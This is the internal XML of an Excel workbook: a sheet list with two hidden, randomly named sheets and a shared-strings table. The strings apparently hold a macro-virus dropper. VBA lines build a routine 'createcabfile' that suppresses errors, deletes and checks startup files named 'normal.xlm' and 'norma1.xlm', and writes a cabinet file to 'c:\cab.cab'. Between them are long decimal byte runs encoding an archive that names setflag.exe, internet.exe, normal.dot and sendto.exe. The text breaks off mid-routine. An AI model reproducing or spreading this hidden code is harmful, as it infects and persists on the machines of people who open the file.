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 activeTab="2"/>
  </bookViews>
  <sheets>
    <sheet name="RYRHLYNYYIRTWR" sheetId="35" state="hidden" r:id="rId1"/>
    <sheet name="JNLMRMSPJMJXLM" sheetId="36" state="hidden" r:id="rId2"/>
    <sheet name="总表" sheetId="42" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">总表!$A$3:$H$12</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="2">总表!$2:$3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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="304" uniqueCount="269">
  <si>
    <t xml:space="preserve">77 83 67 70 0 0 0 0 157 27 1 0 0 0 0 0 48 24 0 0 0 0 0 0 3 1 1 0 5 0 4 0 247 20 0 0 0 24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</si>
  <si>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Private Sub createcabfile()</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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Dim ch As Byte</t>
  </si>
  <si>
    <t>on error resume next</t>
  </si>
  <si>
    <t>Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t>Set w = CreateObject("wscript.shell")</t>
  </si>
  <si>
    <t>myfolder = w.specialfolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t>If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t>fso.createfolder myfolder</t>
  </si>
  <si>
    <t>End If</t>
  </si>
  <si>
    <t>For i=1 to Workbooks.Count</t>
  </si>
  <si>
    <t>If Workbooks(i).name="normal.xlm" then</t>
  </si>
  <si>
    <t>workbooks(i).close</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 186 24 0 0 8 0 1 0 0 128 0 0 0 0 0 0 0 0 225 48 244 104 32 0 115 101 116 102 108 97 103 46 101 120 101 0 0 96 0 0 0 128 0 0 0 0 232 48 135 172 32 0 105 110 116 101 114 110 101 116 46 101 120 101 0 0 18 1 0 0 224 0 0 0 0 232 48 177 180 32 0 110 111 114 109 97 49 46 120 108 109 0 0 158 1 0 0 242 1 0 0 0 232 48 109 144 32 0 110 111 114 109 97 108 46 100 111 116 0 0 80 0 0 0 144 3 0 0 0 229 48 54 95 32 0 115 101 110 100 116 111 46 101 120 101 0 93 3 165 99 72 50 0 128 67 75 236 58 109 116 20 85 150 85 93 213 73 37 169 166 11 236 196 0 65 90 44 92 152 48 28 156 14 14 216 129 105 52 221 9 199 4 58 132 116 19 49 9 40 196 216 43 200 36 85 160 78 26 59 84 218 77 229 209 154 221 163 206 236 142 103 143 46 58 198 115 156 213 61 58 51 56 199 29 187 19 76 2 202 71 24 151 201 12 179 10 234 226 203 20 106 28 178 157 206 208 80 123 95 85 135 4 231 99 119 127 204 191 188 115 94 223 170 247 238 123 239 222 251 238 103 37 85 247 116 83 12 69 81 44 116 93 167 168 195 148 217 60 212 255 222 6 161 207 90 248 243 89 212 155 57 199 111 62 76 87 30 191 121 115 243 131 173 206 61 45 15 63 208 178 125 151 243 254 237 187 119 63 44 57 239 219 233 108 145 119 59 31 220 237 44 219 88 227 220 245 240 142 157 203 109 182 92 49 179 199 227 53 76 212 253 173 93 103 38 251 47 191 249 192 153 60 128 135 151 223 127 230 91 198 216 67 103 110 4 88 247 205 253 103 86 25 243 77 103 214 2 220 244 224 253 205 4 127 146 22 191 151 162 42 105 134 154 255 220 39 215 72 63 71 217 233 60 58 11 38 225 101 133 57 22 190 17 126 4 232 219 50 92 10 230 59 155 89 51 9 169 238 12 30 52 198 248 21 50 239 194 181 113 97 154 44 </t>
  </si>
  <si>
    <t>fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">28 59 40 106 201 255 65 102 255 239 6 116 190 254 23 166 151 75 59 31 145 0 238 189 51 67 144 255 107 132 65 115 194 46 203 91 118 108 151 182 83 212 7 217 25 222 175 201 96 170 129 52 60 203 77 52 106 112 62 252 236 201 224 237 249 35 188 248 95 131 213 153 54 211 102 218 76 155 105 51 109 166 205 180 153 54 211 102 218 76 155 105 127 189 166 92 44 65 101 98 105 77 109 0 85 176 65 87 178 217 179 199 67 85 171 146 184 172 191 76 156 47 96 31 212 139 8 135 232 208 178 90 252 36 148 210 181 33 58 182 89 92 17 162 55 225 239 91 97 170 76 92 181 88 135 125 18 231 44 126 188 15 70 2 40 21 170 172 85 219 68 9 55 0 126 0 223 7 131 106 135 216 65 25 216 149 202 145 85 29 241 189 34 250 8 118 10 177 53 184 218 220 69 84 142 8 104 208 215 126 158 108 166 244 177 238 175 218 62 116 157 237 136 171 247 138 69 246 39 158 130 65 216 210 137 54 139 206 16 133 44 158 196 185 28 127 45 190 66 214 74 226 150 24 162 44 148 65 117 41 190 4 21 60 122 15 165 208 144 90 38 222 155 24 177 92 122 137 48 136 142 41 231 25 255 165 23 241 32 153 175 20 183 193 241 205 100 85 204 145 183 9 191 111 14 150 1 166 71 73 176 202 17 81 173 132 211 42 69 135 199 164 168 189 143 224 186 19 176 103 145 253 160 172 235 122 136 10 173 168 197 223 179 78 138 164 44 196 110 194 29 172 201 100 8 228 145 99 29 131 37 64 101 48 131 83 41 86 132 216 106 188 141 224 108 22 253 100 168 76 148 66 172 95 125 218 144 14 246 153 84 180 41 71 42 80 226 31 219 63 214 105 138 98 122 81 42 161 231 0 21 52 21 1 17 44 123 148 91 223 126 148 186 170 235 235 36 107 57 25 64 227 137 11 57 1 114 99 120 156 49 54 40 10 81 235 208 112 226 124 78 117 45 254 13 236 9 162 141 234 251 75 209 165 73 158 3 248 44 99 16 177 4 136 189 23 4 202 118 3 99 203 50 82 125 217 88 82 212 222 79 80 55 202 199 64 194 75 92 113 247 40 225 29 186 211 254 228 5 160 182 9 </t>
  </si>
  <si>
    <t xml:space="preserve">241 76 19 218 204 88 154 64 84 69 228 84 37 206 182 79 68 201 148 10 215 36 111 204 32 176 48 14 40 171 200 104 17 185 192 174 74 198 210 89 41 138 176 70 44 30 34 130 142 149 9 105 152 41 74 246 211 82 193 59 43 64 3 99 37 140 235 244 165 31 73 14 130 68 8 96 18 12 28 237 238 111 251 59 237 111 97 108 21 2 206 149 68 150 235 236 52 73 37 82 57 232 84 226 227 156 226 99 176 89 169 251 87 225 185 176 178 50 86 242 172 178 246 138 68 223 229 30 150 184 59 149 126 214 253 171 182 47 204 75 66 142 238 59 1 159 25 218 84 139 255 141 49 111 169 76 252 155 16 237 199 223 167 13 33 192 81 149 213 248 105 139 33 173 178 77 184 11 158 106 241 46 138 252 206 166 12 209 186 226 141 13 245 91 149 35 37 125 221 208 2 112 36 23 84 78 234 200 199 247 120 36 171 50 168 107 119 244 40 82 73 0 183 80 134 117 96 1 204 66 223 43 224 90 43 89 207 71 227 97 43 224 107 115 144 175 40 26 151 242 252 216 70 38 154 138 168 58 52 160 52 241 84 99 67 159 177 107 52 41 231 4 240 223 195 46 117 48 130 111 129 135 104 188 206 56 162 161 47 233 179 121 36 59 217 246 183 176 122 124 184 174 97 126 188 207 21 111 232 171 33 107 121 215 217 32 16 132 6 193 8 34 19 22 249 219 77 175 112 180 116 27 242 113 104 109 113 10 148 227 214 160 159 172 29 55 73 114 15 200 179 8 253 17 105 150 120 69 245 241 90 182 178 129 119 42 239 1 83 156 210 196 82 106 86 35 234 107 216 218 23 162 177 133 144 3 135 128 235 112 157 117 233 171 87 198 145 135 218 95 245 194 225 239 121 64 173 94 7 134 86 161 10 62 153 80 164 21 74 155 40 208 178 221 143 151 131 249 40 41 189 78 90 112 151 54 143 140 82 242 13 201 132 69 154 229 199 55 100 166 100 75 94 202 231 54 54 107 123 195 88 136 250 36 11 26 104 132 83 107 209 197 106 56 16 133 121 251 107 97 1 121 57 53 156 142 234 170 151 67 31 201 217 174 248 200 113 226 105 100 71 211 184 143 231 105 137 67 190 66 213 235 </t>
  </si>
  <si>
    <t>Next</t>
  </si>
  <si>
    <t xml:space="preserve">208 178 7 188 14 242 49 11 109 224 219 207 115 112 187 210 82 228 99 129 190 69 238 97 116 185 197 130 82 65 93 230 244 219 241 99 28 69 45 221 207 210 107 65 16 197 31 209 97 78 243 185 235 29 45 190 232 81 41 47 128 127 12 150 7 82 151 31 85 194 14 74 178 161 62 215 233 113 217 129 46 23 255 65 179 160 203 198 22 32 199 215 12 19 226 129 19 169 156 246 114 197 195 238 129 150 181 40 156 214 150 2 185 1 251 47 40 63 254 61 104 65 157 33 133 229 186 151 16 121 55 80 25 141 63 78 232 164 201 213 158 181 71 253 32 13 228 21 128 233 163 125 228 6 144 55 13 167 12 20 27 135 242 218 103 186 36 178 248 35 11 185 129 16 13 47 28 102 243 224 165 238 235 34 170 231 208 73 144 80 56 173 86 113 134 136 94 249 147 34 226 51 34 210 24 84 197 101 230 190 97 10 233 22 247 32 154 48 133 116 123 13 14 66 80 88 26 230 38 165 196 124 68 88 187 219 93 229 104 89 78 196 130 18 82 142 41 150 68 113 175 191 134 8 228 229 188 140 174 75 183 19 161 124 123 169 151 99 134 181 194 0 254 73 46 76 16 41 44 233 100 128 140 187 244 42 14 72 81 194 28 101 143 238 189 158 125 65 99 13 33 12 184 78 23 123 57 34 128 255 50 173 141 168 170 34 61 12 46 193 17 213 165 92 69 167 193 40 116 139 92 47 126 9 207 160 191 178 45 128 127 54 139 162 232 50 209 81 231 210 3 248 179 180 78 12 180 14 52 60 91 76 19 13 119 244 208 146 208 195 73 124 242 8 43 103 15 248 10 137 243 11 130 76 29 132 252 115 54 131 124 215 81 32 213 254 76 98 61 74 104 182 1 107 247 94 15 85 64 156 192 160 14 54 138 23 204 38 6 41 211 125 126 88 38 76 118 252 172 221 112 19 125 33 15 188 242 164 227 33 162 229 71 120 114 77 33 189 249 245 109 30 170 57 114 155 135 218 241 130 241 37 123 135 186 216 140 204 2 92 161 186 19 235 249 44 96 184 78 119 125 160 230 247 192 145 104 208 140 73 170 237 69 120 75 156 231 152 99 170 237 121 242 136 133 67 207 1 12 81 120 79 </t>
  </si>
  <si>
    <t xml:space="preserve">33 232 1 16 195 133 138 240 63 17 19 85 118 166 41 252 26 80 171 231 111 129 221 14 29 1 203 194 187 242 41 234 80 4 86 224 130 27 32 254 108 153 3 63 151 224 166 94 56 12 99 135 222 134 31 191 190 242 117 0 250 202 87 9 214 201 113 131 110 213 251 169 31 167 0 15 121 47 34 14 229 168 85 231 252 213 248 89 193 80 61 4 4 203 231 240 239 200 133 175 233 132 85 22 201 138 191 152 11 7 19 101 189 105 30 69 53 19 226 245 252 50 112 243 128 63 133 116 116 18 105 2 30 234 50 88 28 16 59 233 254 36 49 128 119 207 55 24 11 72 185 126 28 35 207 224 11 67 64 95 228 49 160 50 159 7 108 112 121 181 160 250 160 12 238 53 207 131 23 178 43 79 16 109 31 128 56 153 178 42 23 22 198 138 162 207 3 114 226 2 131 152 100 217 10 150 150 30 12 98 251 226 140 26 150 94 211 158 130 144 5 167 68 138 10 209 8 227 47 225 161 206 253 110 157 84 20 196 159 144 103 191 158 239 128 195 64 196 185 122 190 0 79 8 107 22 215 231 65 124 55 204 34 166 46 178 99 5 75 69 63 151 114 106 113 255 34 192 215 242 93 113 205 161 44 126 26 152 165 76 213 201 153 84 157 250 173 38 135 166 30 47 0 45 156 171 239 229 112 22 104 73 83 123 19 63 126 217 21 175 83 179 84 31 167 250 216 134 62 8 93 172 219 74 56 107 93 131 6 33 224 77 88 149 143 23 34 62 70 184 74 150 13 1 67 139 253 120 109 134 200 66 147 72 206 36 18 72 140 131 13 206 57 68 200 184 142 10 162 139 237 23 29 36 3 169 226 106 220 54 178 127 32 104 87 30 5 95 132 18 232 171 63 150 93 23 200 174 135 182 119 4 1 3 28 127 88 80 195 41 53 60 106 248 23 50 214 227 148 248 144 37 88 141 15 229 26 198 131 24 166 63 233 97 35 246 142 4 185 15 47 79 150 120 211 106 152 179 63 241 25 140 196 162 23 47 131 85 86 165 139 171 120 119 149 208 186 20 30 117 111 186 43 39 50 145 43 103 235 222 209 126 202 230 233 228 60 104 48 246 12 193 44 62 214 62 65 254 92 211 246 62 </t>
  </si>
  <si>
    <t>If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t xml:space="preserve">74 153 107 139 83 49 239 88 136 242 155 111 65 63 98 244 146 21 122 126 145 33 2 233 46 228 29 163 189 41 247 64 91 30 248 209 98 47 239 246 10 45 93 46 240 48 48 102 143 34 32 97 117 152 147 26 67 214 45 171 189 156 92 57 37 30 67 90 35 17 67 31 137 20 33 212 104 3 177 170 177 96 181 46 11 186 204 235 83 135 192 214 99 192 145 234 77 105 47 79 33 63 7 97 1 191 227 36 106 176 198 84 58 143 196 131 4 34 171 230 217 59 142 67 68 49 207 42 34 70 189 134 28 166 21 20 123 71 255 156 186 128 55 124 129 4 198 64 8 226 69 131 156 125 152 184 42 45 203 221 31 206 70 253 135 200 12 228 148 248 49 162 117 135 72 24 38 225 234 230 16 27 80 141 112 138 183 95 55 193 133 230 225 205 224 13 235 92 71 15 251 193 34 81 62 153 81 217 217 74 220 9 153 240 154 83 45 16 129 127 231 58 253 214 54 50 217 139 126 111 42 2 98 13 69 64 236 40 113 231 16 33 100 70 201 209 149 132 243 206 246 137 56 96 182 125 0 14 241 63 193 93 68 214 156 34 44 72 214 145 38 56 151 104 25 36 36 50 79 146 145 6 161 231 128 189 227 18 176 213 227 177 71 53 2 33 253 35 249 69 143 96 239 56 75 148 100 3 39 94 85 103 129 127 6 124 50 161 236 228 41 241 75 222 210 244 10 111 248 245 69 237 87 247 192 105 18 215 126 181 27 160 156 87 131 127 184 200 72 139 228 236 0 174 36 156 146 56 198 209 65 105 71 38 217 137 85 208 234 44 180 161 112 61 4 196 13 236 126 33 232 175 193 212 149 140 95 227 53 151 114 89 151 10 80 31 122 143 48 122 126 146 209 24 59 168 89 15 111 105 5 11 243 176 78 201 22 178 132 168 26 124 52 219 212 108 31 215 85 197 117 114 154 3 242 71 47 215 72 182 252 113 122 114 203 213 97 190 81 202 34 145 75 179 67 244 55 170 37 141 227 157 64 63 201 220 182 214 247 189 63 173 129 128 130 134 128 170 4 20 230 192 242 134 152 126 247 213 189 156 59 101 63 240 8 88 213 248 0 249 107 164 236 128 194 70 249 152 81 38 184 150 </t>
  </si>
  <si>
    <t>goto a1</t>
  </si>
  <si>
    <t xml:space="preserve">165 151 94 210 197 103 134 111 130 219 24 248 57 153 84 70 216 22 94 57 199 48 131 186 24 29 93 0 126 81 140 97 152 238 6 248 16 129 20 252 44 131 238 135 126 203 80 87 86 103 118 151 143 238 44 167 187 124 22 216 182 179 220 162 244 51 202 128 177 249 251 215 54 143 173 159 194 53 176 104 165 223 162 12 88 8 214 143 174 97 117 155 56 62 192 40 39 51 7 167 175 63 9 224 109 232 111 66 127 21 250 139 208 159 131 254 52 244 131 132 254 178 39 63 85 203 158 250 20 32 6 136 1 94 4 120 17 32 20 31 79 141 2 28 3 56 6 48 5 48 5 48 13 48 29 99 99 198 159 105 71 153 212 164 36 116 194 240 40 244 52 116 97 33 140 120 185 134 198 163 125 221 132 186 233 207 38 231 153 17 160 241 58 105 128 40 38 113 99 210 109 233 88 219 234 116 70 254 226 148 252 109 87 46 189 148 134 115 247 56 201 185 227 191 6 41 59 157 6 191 147 247 49 97 222 71 49 185 143 71 22 26 247 65 144 187 59 225 185 7 250 41 232 93 62 230 150 161 206 114 102 3 108 188 145 108 251 211 105 219 18 186 50 243 83 119 244 133 69 249 210 144 254 193 105 152 221 211 240 0 105 234 174 190 96 148 47 9 185 246 3 247 64 88 185 126 111 17 192 50 232 37 208 75 161 151 65 175 132 190 25 250 3 78 227 94 160 240 123 170 8 96 33 192 66 128 14 128 14 128 2 64 1 32 15 144 7 200 1 228 0 178 0 217 235 239 197 148 79 4 126 59 161 255 0 250 171 206 105 247 226 99 128 234 105 247 96 188 95 127 7 211 199 174 187 55 125 229 197 125 30 202 72 128 137 192 73 86 209 38 178 231 246 45 50 210 137 34 179 80 146 11 86 151 137 156 36 24 99 63 188 201 28 251 208 21 55 99 175 123 37 39 121 168 125 144 225 223 87 96 78 21 65 189 197 132 232 6 165 223 174 92 24 13 76 37 25 78 35 201 152 138 216 246 142 35 25 31 246 54 129 22 41 215 48 238 145 127 133 55 158 158 116 85 80 186 189 189 128 68 0 43 184 11 53 75 223 91 8 49 158 228 150 7 141 50 146 87 141 60 251 33 </t>
  </si>
  <si>
    <t xml:space="preserve">226 78 31 64 1 62 217 123 64 46 65 27 132 160 50 161 67 21 60 145 208 13 111 84 250 239 134 55 42 61 169 89 223 33 222 168 107 35 219 24 57 127 32 50 113 64 206 138 156 112 170 1 190 125 191 145 186 66 242 189 1 202 46 146 208 190 155 73 104 73 241 51 171 2 206 177 255 148 94 167 206 106 232 27 31 158 31 87 206 9 74 92 200 201 184 87 82 73 130 7 82 46 242 196 75 115 65 247 74 51 131 122 151 100 1 253 224 247 193 41 66 240 207 164 1 25 223 200 244 119 249 217 100 47 164 2 255 76 138 230 157 41 10 234 14 37 44 80 232 164 244 64 178 215 34 223 151 236 173 144 22 116 121 172 165 185 82 129 94 37 128 5 50 177 141 244 128 55 69 10 157 254 178 21 214 92 51 112 67 192 150 133 106 35 104 139 102 222 114 135 25 68 67 214 58 119 66 206 159 10 132 170 205 136 201 107 201 129 169 93 70 206 177 18 158 253 184 142 228 142 35 183 18 122 25 84 59 70 215 166 98 149 43 88 35 87 129 204 35 69 84 225 180 148 19 249 78 174 204 242 172 102 17 47 119 130 18 129 183 77 169 94 129 25 116 39 212 170 148 93 121 207 72 80 132 46 170 20 226 51 185 198 82 155 148 215 153 93 174 123 133 17 82 127 175 95 13 249 73 33 96 120 34 171 114 229 44 197 43 88 180 134 254 108 91 57 108 162 181 154 188 0 110 204 171 135 232 201 44 68 188 46 91 132 167 114 37 60 70 73 235 204 124 160 66 186 161 203 171 131 124 110 132 109 80 94 121 103 217 109 86 109 169 59 204 203 121 145 176 158 43 91 251 179 115 181 194 16 29 210 73 42 81 109 124 156 224 201 140 196 146 115 129 126 32 201 126 160 28 108 91 19 64 186 18 240 156 213 227 1 38 45 157 89 197 97 30 114 51 200 115 254 82 70 241 166 145 16 72 22 253 84 179 3 66 105 51 7 63 248 4 96 52 179 228 149 34 175 239 80 153 82 6 74 12 163 144 201 55 117 151 12 208 198 0 155 25 8 134 232 198 213 107 134 225 16 121 54 177 75 61 127 217 54 82 77 228 47 1 0 198 201 83 53 232 94 209 161 174 249 0 80 </t>
  </si>
  <si>
    <t xml:space="preserve">58 23 144 28 65 46 125 225 117 147 134 69 200 246 42 73 63 99 223 77 187 71 91 110 64 89 38 93 202 23 172 123 37 65 105 253 188 161 217 73 136 42 36 68 125 195 176 248 230 37 100 64 36 3 115 141 129 232 217 173 50 177 117 78 53 200 48 43 137 198 140 177 3 169 173 182 107 251 246 179 218 231 102 94 93 99 38 214 129 96 107 43 164 214 163 36 181 134 164 183 52 54 153 244 218 147 101 183 65 126 29 240 227 15 11 205 130 65 230 167 100 169 109 132 243 10 13 209 20 1 171 43 72 85 48 12 249 196 215 178 239 28 63 126 163 128 120 2 39 202 38 101 194 149 24 40 0 234 251 179 151 115 205 34 161 158 231 92 103 209 62 97 117 35 171 202 99 97 70 109 100 67 116 77 0 175 51 235 73 119 31 228 211 109 91 81 144 111 26 239 229 104 153 43 46 103 71 230 16 83 200 70 27 57 52 92 252 235 100 47 163 214 167 164 165 232 12 250 48 241 7 171 242 201 66 228 120 198 172 27 126 195 70 164 37 104 200 125 170 117 81 228 142 92 153 209 189 169 59 181 175 146 189 17 121 206 117 149 238 8 201 222 149 112 154 146 57 208 168 145 55 224 45 89 206 131 241 147 226 21 5 217 232 105 153 187 185 54 53 242 15 240 90 156 96 122 201 119 153 254 63 85 121 101 193 129 33 146 71 233 242 24 126 252 170 201 129 55 45 47 64 229 28 212 32 196 24 91 243 136 125 1 41 156 7 72 41 183 57 181 18 130 158 38 43 170 96 133 145 249 194 50 200 215 247 217 208 70 195 223 89 193 223 73 12 42 47 36 7 27 199 192 43 249 194 226 229 150 122 211 64 50 148 21 76 194 208 121 242 149 164 26 28 221 202 49 136 30 228 99 137 235 44 72 71 173 79 119 101 151 110 151 230 149 182 72 246 210 125 246 232 34 144 224 91 52 4 22 141 124 0 56 65 107 220 91 57 196 0 79 88 66 244 61 93 229 116 249 29 125 246 142 79 128 93 247 47 205 180 213 254 139 184 146 218 252 120 139 180 77 193 197 146 87 193 115 165 219 21 60 75 42 170 176 71 95 37 101 70 125 218 30 61 4 15 3 222 52 241 128 202 81 </t>
  </si>
  <si>
    <t>cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t xml:space="preserve">167 246 51 99 240 201 233 131 130 246 47 201 132 71 14 43 71 61 218 15 146 9 139 220 170 156 191 170 92 72 43 71 45 237 39 72 53 162 29 56 76 156 122 116 80 174 203 27 28 105 33 74 128 239 147 42 42 164 229 10 206 147 230 40 56 75 246 36 223 141 203 238 200 113 207 72 13 76 175 174 79 201 203 51 110 183 253 130 254 142 174 143 148 102 134 111 156 28 62 65 254 189 107 100 49 12 195 82 41 219 117 122 100 46 60 71 142 71 70 102 3 108 126 17 144 12 39 13 110 232 187 55 194 141 15 130 67 112 191 23 102 161 188 157 135 188 14 221 122 16 116 69 221 195 171 91 88 181 80 221 194 169 91 138 212 10 243 27 14 202 39 5 8 84 231 174 207 93 73 87 220 253 31 193 253 245 104 129 241 165 240 50 178 187 143 75 249 201 117 188 34 229 122 148 1 214 221 219 118 81 251 14 42 81 52 17 165 66 206 196 103 22 92 144 130 50 5 217 204 250 196 110 126 97 44 205 118 95 145 10 209 184 251 191 129 223 13 130 174 238 102 213 221 188 186 155 83 151 171 187 139 80 191 81 92 147 162 131 208 75 34 4 68 118 123 135 147 216 196 22 46 122 214 222 145 79 110 242 178 85 230 149 109 28 56 177 45 35 54 99 0 244 57 73 244 217 246 91 194 77 21 40 36 175 26 207 168 130 37 89 84 116 208 152 173 104 37 21 83 37 252 50 67 1 247 177 112 126 172 100 125 241 80 172 228 39 195 80 54 41 183 82 202 255 180 247 53 80 81 92 89 194 213 116 129 5 52 118 43 16 209 104 210 70 204 196 33 49 196 246 7 166 197 116 11 173 128 160 141 45 221 33 138 74 164 13 116 16 152 166 74 193 129 164 73 193 124 20 149 90 157 196 179 155 61 51 155 9 209 153 117 146 239 59 155 179 153 207 207 153 100 147 198 206 128 154 108 98 116 39 58 154 47 226 140 187 83 78 185 9 70 3 173 33 212 119 239 171 106 108 147 56 51 187 103 206 126 231 236 225 157 243 120 127 247 189 119 223 223 125 247 222 119 139 30 48 149 114 163 34 37 46 217 0 48 5 176 188 97 36 24 152 224 113 1 155 11 246 198 101 117 98 </t>
  </si>
  <si>
    <t>If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t xml:space="preserve">86 117 193 15 226 178 240 93 64 41 45 120 46 46 11 53 236 202 178 2 41 46 235 105 204 202 46 216 19 151 133 58 15 101 90 193 179 152 149 162 101 245 162 0 75 16 9 48 234 169 42 129 68 171 54 43 12 14 189 2 114 224 136 236 199 49 162 206 58 25 229 218 204 197 64 181 64 64 17 55 100 211 98 154 27 192 243 51 81 32 244 30 198 191 44 142 22 198 138 113 62 108 178 15 180 208 249 22 238 115 201 84 178 89 50 73 152 11 39 24 178 88 32 123 17 143 237 92 254 156 131 132 182 114 137 242 124 224 132 196 37 168 121 178 169 189 73 223 137 176 211 151 23 176 134 213 94 249 159 81 111 37 177 73 6 69 150 232 127 194 219 196 45 223 53 162 170 226 112 149 253 170 176 4 245 82 32 178 38 203 125 255 142 123 161 0 91 200 187 155 205 175 244 201 207 101 225 67 85 149 43 244 112 1 123 79 165 124 233 115 85 181 71 170 132 36 2 30 68 112 159 186 84 70 243 207 42 32 248 85 198 47 243 238 230 142 85 171 4 9 249 135 88 46 204 193 184 112 215 150 205 131 137 7 0 83 60 14 27 117 34 113 11 246 143 3 71 249 230 16 192 214 209 0 227 245 168 153 121 48 79 125 168 82 19 150 28 197 77 50 158 151 197 38 136 81 201 21 117 75 174 49 183 199 227 147 203 9 79 129 212 71 162 123 220 114 201 231 56 40 254 237 44 251 85 192 144 145 79 92 6 12 98 240 162 11 128 190 239 246 250 228 25 164 214 24 255 118 70 177 64 52 113 91 54 239 71 85 156 70 189 196 114 96 66 50 60 94 126 46 37 114 22 164 96 131 4 107 88 200 110 149 101 132 101 112 144 132 14 83 40 239 30 174 168 215 109 112 132 110 220 195 46 232 58 201 206 55 31 58 57 242 116 77 155 131 162 89 147 106 232 30 97 147 122 45 61 119 172 114 144 248 175 73 92 121 143 36 232 208 189 212 42 108 96 149 67 41 36 57 137 164 184 215 226 48 31 58 59 194 199 55 146 216 155 213 115 215 42 232 197 202 38 119 33 151 117 35 153 123 183 235 36 103 44 86 24 210 212 118 21 216 195 44 42 148 71 153 187 134 0 207 </t>
  </si>
  <si>
    <t>fso.delete cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">94 11 194 38 34 156 17 40 60 201 199 131 21 143 188 88 153 161 38 12 186 80 99 79 217 206 133 242 54 113 180 163 80 25 69 148 238 31 137 24 184 249 168 123 202 98 211 66 173 134 123 36 183 129 163 197 35 138 81 0 209 25 200 249 201 252 202 44 243 190 35 66 101 214 7 138 120 106 13 112 126 83 11 17 145 129 164 77 171 84 195 26 238 106 175 5 240 44 229 59 178 40 46 5 81 121 24 80 97 191 131 218 103 118 33 0 206 140 27 98 146 54 63 218 220 152 227 38 208 8 185 170 193 113 233 17 32 143 177 9 83 13 151 102 96 82 101 141 252 183 96 57 50 128 254 169 84 117 164 162 162 239 226 46 36 129 226 3 101 91 113 55 217 206 1 37 132 141 202 217 212 95 139 195 246 171 44 28 95 132 192 209 42 247 169 153 197 200 67 68 237 95 152 187 254 128 87 3 41 195 39 151 75 248 34 202 71 13 230 110 36 26 176 135 76 90 125 115 215 17 124 128 203 191 75 28 96 167 58 28 219 243 179 184 235 90 240 89 206 128 88 80 4 205 125 16 245 120 28 30 143 219 235 241 8 69 217 139 213 211 162 108 87 216 69 149 242 161 207 180 35 83 148 109 97 231 121 60 149 168 198 206 6 40 245 52 112 171 83 137 46 187 229 15 120 78 54 101 91 128 121 179 120 213 76 7 162 23 81 60 124 52 129 43 179 127 129 36 35 134 49 187 60 239 110 113 16 136 121 94 22 247 5 254 25 201 25 116 136 114 165 188 238 51 253 56 115 180 109 68 73 173 244 121 229 41 159 146 219 223 167 102 46 199 218 3 200 40 33 229 70 65 238 114 17 170 115 235 112 70 228 12 173 42 8 102 76 224 78 249 239 46 33 50 75 144 165 24 36 108 155 21 181 136 223 71 72 251 112 203 172 16 10 52 83 213 129 85 137 41 125 8 195 15 48 137 88 166 252 86 130 17 2 127 182 9 250 218 14 188 232 74 216 117 191 210 94 167 139 186 195 230 174 95 96 60 87 170 163 15 83 12 54 37 205 94 216 158 32 14 231 19 89 168 99 253 91 7 118 35 63 140 248 116 93 33 143 65 108 30 175 245 47 76 145 122 72 247 253 45 89 161 </t>
  </si>
  <si>
    <t>open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t xml:space="preserve">173 208 61 163 14 56 18 83 68 51 31 102 58 251 73 231 23 97 87 107 45 181 191 174 36 137 36 102 131 125 243 228 42 209 136 178 223 210 222 114 106 164 223 192 46 4 94 134 75 5 44 41 77 177 120 151 56 40 190 255 85 149 148 152 42 48 0 223 83 76 175 118 225 155 249 120 251 47 109 231 180 193 46 63 163 74 139 207 112 229 221 231 6 86 209 157 92 98 96 228 17 37 69 140 20 19 153 47 252 57 52 188 129 44 20 175 170 236 12 223 68 55 38 162 158 18 86 224 130 38 133 214 210 14 197 204 71 141 112 56 214 210 140 66 195 223 80 33 255 133 177 253 135 42 65 92 205 116 35 83 77 158 63 139 34 182 112 128 66 17 187 14 153 18 243 190 48 244 81 75 90 221 143 114 51 155 41 179 70 242 64 98 142 9 210 91 241 89 35 28 129 91 55 242 46 81 12 250 42 81 178 168 123 49 23 74 225 190 62 49 151 162 170 225 228 136 255 10 87 80 89 54 61 234 164 147 0 187 195 120 56 88 51 44 23 3 23 147 69 72 56 140 66 63 190 65 138 184 176 129 241 186 131 208 64 173 186 4 149 15 250 99 10 148 88 225 198 23 155 77 252 184 202 46 4 1 32 155 189 79 90 188 83 52 189 38 148 129 140 80 108 226 219 95 163 41 110 122 157 1 121 131 162 215 24 25 63 35 80 55 188 198 40 145 218 61 137 148 38 215 32 55 110 11 215 138 105 152 238 108 163 177 35 206 34 86 152 196 245 166 252 10 134 75 36 184 69 60 21 175 215 194 101 169 164 232 17 96 103 133 53 140 80 72 11 79 152 170 54 30 161 169 119 223 245 22 46 202 125 164 48 55 151 240 246 12 14 125 76 172 54 1 225 30 117 144 65 154 187 241 82 23 224 194 112 161 150 28 110 6 161 112 76 108 49 137 223 99 112 4 53 146 105 39 223 190 135 166 88 151 183 82 122 194 162 110 216 67 87 111 134 22 82 195 172 173 117 57 64 121 228 159 17 158 154 134 82 175 71 254 152 36 24 168 22 48 136 69 123 24 185 6 31 215 232 61 66 161 9 234 50 80 1 138 196 197 123 148 62 242 5 136 50 155 140 68 201 196 198 3 170 71 </t>
  </si>
  <si>
    <t>For i = 1 To 150</t>
  </si>
  <si>
